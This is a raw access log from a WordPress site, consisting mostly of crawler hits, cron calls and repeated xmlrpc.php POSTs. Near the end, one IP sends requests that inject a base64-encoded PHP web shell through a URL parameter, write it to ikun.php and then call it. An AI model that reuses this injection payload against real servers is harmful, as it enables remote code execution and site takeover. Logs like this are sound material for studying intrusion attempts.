216.73.216.162 - - [07/Sep/2025:00:56:01 +0700] "GET /getting-someone-in-a-different-country/ HTTP/1.0" 200 72015 "https://vattusacky.vn/getting-someone-in-a-different-country" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
69.49.241.21 - - [07/Sep/2025:00:56:04 +0700] "POST /xmlrpc.php HTTP/1.0" 200 956 "https://vattusacky.vn" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0"
45.117.177.72 - - [07/Sep/2025:00:56:24 +0700] "POST /wp-cron.php?doing_wp_cron=1757181384.5093700885772705078125 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
217.113.194.75 - - [07/Sep/2025:00:56:23 +0700] "GET /tetap-aman-dan-nyaman-bermain-togel-online-di-situs-terpercaya/ HTTP/1.0" 200 65863 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.81 - - [07/Sep/2025:00:56:49 +0700] "GET /marriage-tips-and-advice-how-to-maintain-your-marriage-happy-and-healthy-for-the-long-term/feed/ HTTP/1.0" 200 1875 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
216.244.66.237 - - [07/Sep/2025:00:57:03 +0700] "GET /robots.txt HTTP/1.0" 200 984 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
217.113.194.80 - - [07/Sep/2025:00:57:09 +0700] "GET /up-x-oficialnyj-sajt-zerkalo-ap-iks-rabochij-vhod-3/feed/ HTTP/1.0" 200 2026 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
45.117.177.72 - - [07/Sep/2025:00:57:30 +0700] "POST /wp-cron.php?doing_wp_cron=1757181450.7351870536804199218750 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
217.113.194.78 - - [07/Sep/2025:00:57:29 +0700] "GET /up-x-oficialnyj-sajt-zerkalo-ap-iks-rabochij-vhod-2/feed/ HTTP/1.0" 200 1814 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
20.171.207.115 - - [07/Sep/2025:00:57:40 +0700] "GET /the-role-of-anonymity-in-omegles-chat-experience/ HTTP/1.0" 200 91791 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
217.113.194.217 - - [07/Sep/2025:00:57:48 +0700] "GET /from-strangers-to-friends-building-lasting-relationships-on-omegle-and-ometv/feed/ HTTP/1.0" 200 1825 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.81 - - [07/Sep/2025:00:58:08 +0700] "GET /empathy-and-understanding-in-omegle-connections-lessons-from-omegle-chronicles/feed/ HTTP/1.0" 200 1831 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
45.117.177.72 - - [07/Sep/2025:00:58:29 +0700] "POST /wp-cron.php?doing_wp_cron=1757181508.8773300647735595703125 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
217.113.194.79 - - [07/Sep/2025:00:58:27 +0700] "GET /finest-courting-sites-new-york-the-7-greatest-dating-apps-websites-in-ny-city/feed/ HTTP/1.0" 200 1835 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.78 - - [07/Sep/2025:00:58:47 +0700] "GET /entertaining-blunders-and-mistakes-on-omegle-that-are-absolutely-hilarious/feed/ HTTP/1.0" 200 1819 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.74 - - [07/Sep/2025:00:59:06 +0700] "GET /missija-kompanii-kak-ejo-sozdat%D1%8C-primery-izvestnyh/ HTTP/1.0" 200 282739 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
45.117.177.72 - - [07/Sep/2025:00:59:18 +0700] "POST /wp-cron.php?doing_wp_cron=1757181558.1343979835510253906250 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
165.22.218.230 - - [07/Sep/2025:00:59:16 +0700] "POST /xmlrpc.php HTTP/1.0" 200 956 "https://vattusacky.vn" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36"
217.113.194.217 - - [07/Sep/2025:00:59:48 +0700] "GET /missija-kompanii-kak-ejo-sozdat%D1%8C-primery-izvestnyh/feed/ HTTP/1.0" 200 1817 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.75 - - [07/Sep/2025:01:00:07 +0700] "GET /the-influence-of-cultural-norms-on-omegle-conversations-navigating-differences-with-respect/ HTTP/1.0" 200 91926 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
45.117.177.72 - - [07/Sep/2025:01:00:29 +0700] "POST /wp-cron.php?doing_wp_cron=1757181628.9984490871429443359375 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
85.208.96.208 - - [07/Sep/2025:01:00:27 +0700] "GET /danh-muc/moi-truong-khi/bom-lay-mau-bui-tsp-pm10-pm2-5/page/3/ HTTP/1.0" 200 182792 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
154.54.249.200 - - [07/Sep/2025:01:00:32 +0700] "GET /the-influence-of-cultural-norms-on-omegle-conversations-navigating-differences-with-respect/feed/ HTTP/1.0" 200 1870 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.81 - - [07/Sep/2025:01:00:57 +0700] "GET /leovegas-reviews-go-through-customer-support-reviews-of-leovegas-com-12-15-of-89/ HTTP/1.0" 200 221799 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.72 - - [07/Sep/2025:01:01:41 +0700] "GET /breaking-down-emotional-walls-building-intimacy-through-vulnerability-on-omegle/feed/ HTTP/1.0" 200 1834 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
45.117.177.72 - - [07/Sep/2025:01:02:14 +0700] "POST /wp-cron.php?doing_wp_cron=1757181733.8747549057006835937500 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
217.113.194.72 - - [07/Sep/2025:01:02:12 +0700] "GET /the-intersection-of-technology-and-intimacy-examining-omegles-impact-on-relationships/feed/ HTTP/1.0" 200 1852 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
45.117.177.72 - - [07/Sep/2025:01:02:30 +0700] "POST /wp-cron.php?doing_wp_cron=1757181750.0652990341186523437500 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
194.233.90.149 - - [07/Sep/2025:01:02:28 +0700] "POST /xmlrpc.php HTTP/1.0" 200 956 "https://vattusacky.vn" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0"
217.113.194.81 - - [07/Sep/2025:01:02:43 +0700] "GET /the-role-of-body-language-in-omegle-conversations-making-the-most-of-non-verbal-cues/feed/ HTTP/1.0" 200 1849 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
57.141.2.37 - - [07/Sep/2025:01:02:51 +0700] "GET /unlocking-discovery-adventures-in-omegles-serendipitous-conversations/ HTTP/1.0" 200 93712 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
217.113.194.218 - - [07/Sep/2025:01:03:15 +0700] "GET /the-role-of-virtual-masks-in-breaking-societal-norms-and-stereotypes-on-omegle/feed/ HTTP/1.0" 200 1831 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.76 - - [07/Sep/2025:01:03:40 +0700] "GET /the-role-of-authenticity-in-omegle-conversations-being-genuine-and-true-to-yourself/feed/ HTTP/1.0" 200 1846 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.79 - - [07/Sep/2025:01:04:01 +0700] "GET /the-role-of-intuition-in-omegle-conversations-trusting-your-gut-in-online-interactions/ HTTP/1.0" 200 92092 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
45.117.177.72 - - [07/Sep/2025:01:04:31 +0700] "POST /wp-cron.php?doing_wp_cron=1757181871.3609778881072998046875 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
217.113.194.217 - - [07/Sep/2025:01:04:29 +0700] "GET /the-role-of-empathy-in-omegle-conversations-cultivating-understanding-and-connection/ HTTP/1.0" 200 91497 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
216.244.66.237 - - [07/Sep/2025:01:04:35 +0700] "GET /navigating-the-language-barrier-on-omegle/feed/ HTTP/1.0" 200 1720 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
217.113.194.75 - - [07/Sep/2025:01:04:51 +0700] "GET /the-role-of-empathy-in-omegle-conversations-cultivating-understanding-and-connection/feed/ HTTP/1.0" 200 1849 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.74 - - [07/Sep/2025:01:05:11 +0700] "GET /the-role-of-random-chatting-in-the-digital-age-an-analysis-of-omegle-and-ometv/ HTTP/1.0" 200 91592 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
45.117.177.72 - - [07/Sep/2025:01:05:40 +0700] "POST /wp-cron.php?doing_wp_cron=1757181940.3949210643768310546875 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
217.113.194.77 - - [07/Sep/2025:01:05:39 +0700] "GET /the-role-of-chance-in-making-meaningful-connections-on-omegle-and-ometv/feed/ HTTP/1.0" 200 1810 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
54.156.124.2 - - [07/Sep/2025:01:05:43 +0700] "GET /hustle-roms-play-your-favorite-playstation-a-couple-of-games-with-your-mobile-machine/ HTTP/1.0" 200 206300 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.91.152.238 - - [07/Sep/2025:01:05:47 +0700] "POST /xmlrpc.php HTTP/1.0" 200 956 "https://vattusacky.vn" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1"
3.216.86.144 - - [07/Sep/2025:01:05:47 +0700] "GET /learning-to-make-a-man-want-to-kiss-you/ HTTP/1.0" 200 208585 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
34.193.2.57 - - [07/Sep/2025:01:05:51 +0700] "GET /category/uncategorized/page/350/ HTTP/1.0" 200 76723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
44.212.106.171 - - [07/Sep/2025:01:05:55 +0700] "GET /category/uncategorized/page/182/ HTTP/1.0" 200 76318 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
217.113.194.81 - - [07/Sep/2025:01:05:58 +0700] "GET /the-role-of-technology-in-enhancing-serendipitous-moments-on-omegle-and-ometv/ HTTP/1.0" 200 93287 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
44.207.207.36 - - [07/Sep/2025:01:05:59 +0700] "GET /pin-up-casino-casino-peru-gambling-pin-up-casino-online/ HTTP/1.0" 200 97410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
45.117.177.72 - - [07/Sep/2025:01:06:25 +0700] "POST /wp-cron.php?doing_wp_cron=1757181985.6122529506683349609375 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
217.113.194.81 - - [07/Sep/2025:01:06:24 +0700] "GET /omegle-and-societal-impact-examining-the-broader-implications-of-anonymous-connections/feed/ HTTP/1.0" 200 1855 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.81 - - [07/Sep/2025:01:06:44 +0700] "GET /omegle-and-mental-health-support-utilizing-the-platform-for-emotional-connection-and-crisis-assistance/feed/ HTTP/1.0" 200 1903 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
85.208.96.193 - - [07/Sep/2025:01:06:58 +0700] "GET /unlocking-the-potential-embracing-the-unexpected-on-omegle/ HTTP/1.0" 200 93171 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
217.113.194.72 - - [07/Sep/2025:01:07:06 +0700] "GET /omegle-and-mental-health-awareness-promoting-conversations-and-support-for-those-struggling/feed/ HTTP/1.0" 200 1870 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
45.117.177.72 - - [07/Sep/2025:01:07:27 +0700] "POST /wp-cron.php?doing_wp_cron=1757182047.1669580936431884765625 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
217.113.194.78 - - [07/Sep/2025:01:07:25 +0700] "GET /omegle-and-ometv-investigating-the-impact-on-self-esteem-and-social-anxiety/ HTTP/1.0" 200 91790 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.217 - - [07/Sep/2025:01:07:53 +0700] "GET /omegle-for-storytelling-sharing-personal-narratives-and-connecting-through-shared-experiences/feed/ HTTP/1.0" 200 1876 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.72 - - [07/Sep/2025:01:08:13 +0700] "GET /omegle-spy-mode-understanding-the-anonymity-behind-the-veiled-conversations/feed/ HTTP/1.0" 200 1822 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.75 - - [07/Sep/2025:01:08:33 +0700] "GET /meskipun-gambling-den-sbobet-kian-teras-di-live-sbobet-25rb/ HTTP/1.0" 200 208010 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
152.58.62.17 - - [07/Sep/2025:01:08:31 +0700] "POST /xmlrpc.php HTTP/1.0" 200 956 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; x86) AppleWebKit/537.36 (KHTML, like Gecko) Safari/12.0.0.0 Safari/537.36"
217.113.194.76 - - [07/Sep/2025:01:09:08 +0700] "GET /meskipun-gambling-den-sbobet-kian-teras-di-live-sbobet-25rb/feed/ HTTP/1.0" 200 1774 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
155.4.47.54 - - [07/Sep/2025:01:09:14 +0700] "POST /xmlrpc.php HTTP/1.0" 200 956 "https://vattusacky.vn" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36"
154.54.249.200 - - [07/Sep/2025:01:09:28 +0700] "GET /darmowe-spiny-bez-depozytu-odbierz-free-spiny-2023/feed/ HTTP/1.0" 200 1747 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
45.117.177.72 - - [07/Sep/2025:01:09:50 +0700] "POST /wp-cron.php?doing_wp_cron=1757182189.8891789913177490234375 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
217.113.194.77 - - [07/Sep/2025:01:09:48 +0700] "GET /online-dating-on-omegle-and-ometv-exploring-love-and-relationships-in-the-digital-age/feed/ HTTP/1.0" 200 1852 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.218 - - [07/Sep/2025:01:10:09 +0700] "GET /maksim-krippa-centralnyj-napadajushhij-faw-dolzhen-280/feed/ HTTP/1.0" 200 1851 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.75 - - [07/Sep/2025:01:10:28 +0700] "GET /making-the-most-of-omegle-and-ometv-tips-for-engaging-conversations-and-building-connections/feed/ HTTP/1.0" 200 1873 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.78 - - [07/Sep/2025:01:10:53 +0700] "GET /overcoming-awkwardness-on-omegle-tips-for-making-conversations-flow-smoothly/feed/ HTTP/1.0" 200 1825 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
216.244.66.237 - - [07/Sep/2025:01:10:57 +0700] "GET /embarking-on-a-journey-of-love-and-friendship-in-omelove-stories/ HTTP/1.0" 200 90764 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
217.113.194.81 - - [07/Sep/2025:01:11:14 +0700] "GET /overcoming-prejudice-on-omegle-challenging-assumptions-and-stereotypes-through-conversations/ HTTP/1.0" 200 91638 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
135.181.79.90 - - [07/Sep/2025:01:11:23 +0700] "GET /using-marijuana-147/ HTTP/1.0" 200 207154 "https://vattusacky.vn/using-marijuana-147/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
45.117.177.72 - - [07/Sep/2025:01:11:41 +0700] "POST /wp-cron.php?doing_wp_cron=1757182301.1265079975128173828125 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
217.113.194.81 - - [07/Sep/2025:01:11:39 +0700] "GET /robots.txt HTTP/1.0" 200 984 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.81 - - [07/Sep/2025:01:12:00 +0700] "GET /a-comprehensive-guide-to-face-to-face-video-chats-on-omegle-and-ometv/feed/ HTTP/1.0" 200 1804 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
45.117.177.72 - - [07/Sep/2025:01:12:23 +0700] "POST /wp-cron.php?doing_wp_cron=1757182342.6772489547729492187500 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
217.113.194.75 - - [07/Sep/2025:01:12:21 +0700] "GET /danh-muc/moi-truong-nuoc/do-luu-toc-dong-chay-kenh-ho/ HTTP/1.0" 200 88262 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
103.110.84.40 - - [07/Sep/2025:01:12:44 +0700] "POST /xmlrpc.php HTTP/1.0" 200 956 "https://vattusacky.vn" "Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
216.73.216.162 - - [07/Sep/2025:01:12:47 +0700] "GET /sitemap_index.xml HTTP/1.0" 200 2426 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
217.113.194.217 - - [07/Sep/2025:01:12:49 +0700] "GET /creating-meaningful-connections-video-vs-text-on-omegle-and-ometv/feed/ HTTP/1.0" 200 1792 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
85.208.96.205 - - [07/Sep/2025:01:12:57 +0700] "GET /the-different-types-of-money-in-an-economy/beaxy%20coin HTTP/1.0" 404 70812 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
217.113.194.81 - - [07/Sep/2025:01:13:10 +0700] "GET /the-right-way-to-be-a-better-husband-emotionally-several-ways-to-strengthen-your-marriage/ HTTP/1.0" 200 209552 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
45.117.177.72 - - [07/Sep/2025:01:13:48 +0700] "POST /wp-cron.php?doing_wp_cron=1757182428.1731340885162353515625 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
217.113.194.217 - - [07/Sep/2025:01:13:46 +0700] "GET /the-curious-case-of-omegle-and-ometv-how-random-connections-can-change-lives/ HTTP/1.0" 200 92285 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.218 - - [07/Sep/2025:01:14:12 +0700] "GET /the-psychology-of-chatting-on-omegle-exploring-human-behavior-in-anonymous-conversations/feed/ HTTP/1.0" 200 1861 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
45.117.177.72 - - [07/Sep/2025:01:14:33 +0700] "POST /wp-cron.php?doing_wp_cron=1757182473.1591339111328125000000 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
217.113.194.78 - - [07/Sep/2025:01:14:32 +0700] "GET /gk-obuv-kazahstana-s-nachala-goda-otkryla-bolee-90/feed/ HTTP/1.0" 200 1820 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.74 - - [07/Sep/2025:01:14:51 +0700] "GET /building-empathy-and-understanding-through-networking-on-omegle-and-ometv/feed/ HTTP/1.0" 200 1816 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.74 - - [07/Sep/2025:01:15:11 +0700] "GET /introducing-quotex-a-groundbreaking-broker-providing-binary-and-digital-asset-trading-in-india/feed/ HTTP/1.0" 200 1882 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
45.117.177.72 - - [07/Sep/2025:01:15:39 +0700] "POST /wp-cron.php?doing_wp_cron=1757182539.3056039810180664062500 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
217.113.194.73 - - [07/Sep/2025:01:15:37 +0700] "GET /hustle-roms-play-your-favorite-playstation-a-couple-of-games-with-your-mobile-machine/ HTTP/1.0" 200 206300 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
45.117.177.72 - - [07/Sep/2025:01:16:22 +0700] "POST /wp-cron.php?doing_wp_cron=1757182582.0043981075286865234375 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
160.22.122.134 - - [07/Sep/2025:01:16:20 +0700] "POST /xmlrpc.php HTTP/1.0" 200 956 "https://vattusacky.vn" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62"
45.117.177.72 - - [07/Sep/2025:01:17:42 +0700] "POST /wp-cron.php?doing_wp_cron=1757182661.9099979400634765625000 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
216.73.216.162 - - [07/Sep/2025:01:17:40 +0700] "GET /?p=3116 HTTP/1.0" 301 601 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.162 - - [07/Sep/2025:01:17:42 +0700] "GET /glenjiko-6/ HTTP/1.0" 200 203123 "https://vattusacky.vn/?p=3116" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.191.171.10 - - [07/Sep/2025:01:17:56 +0700] "GET /category/tin-tuc/page/2/ HTTP/1.0" 200 65270 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
45.117.177.72 - - [07/Sep/2025:01:20:06 +0700] "POST /wp-cron.php?doing_wp_cron=1757182806.2008891105651855468750 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
174.138.15.76 - - [07/Sep/2025:01:20:04 +0700] "POST /xmlrpc.php HTTP/1.0" 200 956 "https://vattusacky.vn" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67"
45.117.177.72 - - [07/Sep/2025:01:22:34 +0700] "POST /wp-cron.php?doing_wp_cron=1757182954.3146429061889648437500 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
85.208.96.202 - - [07/Sep/2025:01:22:33 +0700] "GET /can-you-meet-new-people-on-ometv/ HTTP/1.0" 200 85989 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.244.66.237 - - [07/Sep/2025:01:22:58 +0700] "GET /omegle-and-online-harassment-fighting-back-against-trolls/feed/ HTTP/1.0" 200 1768 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
45.117.177.72 - - [07/Sep/2025:01:24:23 +0700] "POST /wp-cron.php?doing_wp_cron=1757183062.8475539684295654296875 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
216.244.66.237 - - [07/Sep/2025:01:24:21 +0700] "GET /the-allure-of-anonymity-exploring-the-appeal-of-omegle-and-ometv/feed/ HTTP/1.0" 200 1789 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.237 - - [07/Sep/2025:01:24:32 +0700] "GET /the-dark-side-of-anonymity-exploring-the-risks-on-omegle-and-ometv/feed/ HTTP/1.0" 200 1795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.73.216.162 - - [07/Sep/2025:01:25:12 +0700] "GET /glenjiko-6/feed HTTP/1.0" 301 704 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.162 - - [07/Sep/2025:01:25:14 +0700] "GET /glenjiko-6/feed/ HTTP/1.0" 200 1479 "https://vattusacky.vn/glenjiko-6/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
45.117.177.72 - - [07/Sep/2025:01:27:05 +0700] "POST /wp-cron.php?doing_wp_cron=1757183225.1822659969329833984375 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
91.224.92.24 - - [07/Sep/2025:01:27:03 +0700] "GET / HTTP/1.0" 301 598 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
91.224.92.24 - - [07/Sep/2025:01:27:06 +0700] "GET / HTTP/1.0" 200 60070 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
85.208.96.193 - - [07/Sep/2025:01:27:08 +0700] "GET /the/bom-lay-mau-bui-lon/page/1/ HTTP/1.0" 301 568 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
91.224.92.24 - - [07/Sep/2025:01:27:09 +0700] "GET /listing?cat=1&keywords=1&latitude=1&location=$%7Bprint(%60echo%20'PD9waHAgJGM9In4rZCgpIl4iIXsre30iOyRiPUAkeyRjfVsiaWt1biJdO0BldmFsKCIiLmJhc2U2NF9kZWNvZGUoJGIpIC4iOyIpOw=='%7Cbase64%20-d%20%3E./php/ikun.php%60)%7D&longitude=1&placeid=the&placetype=the&subcat=1 HTTP/1.0" 301 920 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
91.224.92.24 - - [07/Sep/2025:01:27:11 +0700] "GET /listing?cat=1&keywords=1&latitude=1&location=%7Bprint(%60echo%20PD9waHAgJGM9In4rZCgpIl4iIXsre30iOyRiPUAkeyRjfVsiaWt1biJdO0BldmFsKCIiLmJhc2U2NF9kZWNvZGUoJGIpIC4iOyIpOw==%7Cbase64%20-d%20%3E./php/ikun.php%60)%7D&longitude=1&placeid=the&placetype=the&subcat=1 HTTP/1.0" 404 70812 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
85.208.96.200 - - [07/Sep/2025:01:27:11 +0700] "GET /the/bom-lay-mau-bui-lon/ HTTP/1.0" 200 190150 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
91.224.92.24 - - [07/Sep/2025:01:27:13 +0700] "POST /php/ikun.php HTTP/1.0" 404 70871 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
45.117.177.72 - - [07/Sep/2025:01:27:17 +0700] "POST /wp-cron.php?doing_wp_cron=1757183237.0283889770507812500000 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
